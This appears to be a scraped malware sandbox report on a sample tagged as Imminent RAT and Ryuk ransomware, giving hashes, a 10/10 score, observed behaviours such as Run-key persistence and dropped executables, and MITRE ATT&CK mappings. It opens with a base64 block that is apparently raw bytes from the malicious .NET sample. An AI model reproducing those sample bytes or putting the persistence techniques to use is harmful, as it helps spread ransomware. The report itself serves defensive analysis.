wfEREYmigLAAAK0BIAAAEoDwAACigQAAAKdBIAAAETC94B3Cs2FNADAAABKA8AAApyEgIAcBeNAQAAARMREREWKAQAAAYoCwAACqIRERQUFCgEAAAKKAsAAAoMCHQDAAABKAUAAAYoCwAACgsqAAAAQUgAAAIAAAAtAQAAkAAAAL0BAAAlAAAAAAAAAQIAAAA5AwAAVwAAAJADAAAlAAAAAAAAAQIAAACBAAAArQMAAC4EAAABAAAAAAAAARooBwAABirIwJQAzsrvvgEAAACRAAAAbFN5c3RlbS5SZXNvdXJjZXMuUmVzb3VyY2VSZWFkZXIsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSNTeXN0ZW0uUmVzb3VyY2VzLlJ1bnRpbWVSZXNvdXJjZVNldAIAAAABAAAAAAAAAFBBRFBBRFCQtQIAAAAAAMMAAAACNQAAAAAAIADAlACYa6ZuQV1XKVWfssa92mZHcBs7T1YUcnviND1dLBYKSE4jTVMrOQEYFRcBHF1hi4iCg6OcoaiOmZ+tP58loLugbR9AXfHhNS7tZtRv24PsFfS5EnpZGwM974PFAAE5Vxau4tad7EX2utHChoKilnrtLizSLbKOpczAuISzoIPIT2P39Cbxq0baKkWf6qOcoaiOmX9tYZCUkKyCnz4yJzTG9cOrkLqs+sO1IQ/Y4N2yeKNOBrnCC8iiw8OckaienZ+hv5+loLm/p7Kej7imtaOrJbAxqISjoIO4oL+2/rLuNamiu7iis6Ockaieib+9v5+loKmzt46ej7imtaOrkGI0ZFx2Bta4oH2GQJOUBruCi4iCg6OcoaiOmZ+tv5+loJnvhx6eg7imtaOrkLqsuISzoIO4oL2yuL+2srmCi4iCg6OcoaiOmZ+tv5+loLmzp46ej7imtaOrsPrMsISL

Targets

- Target
  
  e31c8cd9a69d71d4e988de583fc77fe970d7491a89df07611a46235afa8dbe68
- Size
  
  9.5MB
- MD5
  
  a91173d3707d48a5c51240b9aa710f05
- SHA1
  
  1d99b42d879fa8652904f87a1fa9e4a2526e2be5
- SHA256
  
  e31c8cd9a69d71d4e988de583fc77fe970d7491a89df07611a46235afa8dbe68
- SHA512
  
  6ed3bdef2ef3403f5cc0fabdafd1e514c15d6f12055833545b34c12e11f3cf3eb9a339b314c03d237e56f0e1775b332464daa28d010f8193d82a3a18a0173de1
Score

10^/10

imminent ryuk persistence ransomware spyware trojan
- Imminent RAT
  Remote-access trojan based on Imminent Monitor remote admin software.
  trojan spyware imminent
- Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.
  ransomware ryuk
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
  persistence
- Drops desktop.ini file(s)
- Suspicious use of SetThreadContext
behavioral1 behavioral2

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Tasks

Sharing

General

Malware Config

Extracted

Targets

Imminent RAT

Ryuk

Executes dropped EXE

Loads dropped DLL

Adds Run key to start application

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v6

Tasks

static1

behavioral1

behavioral2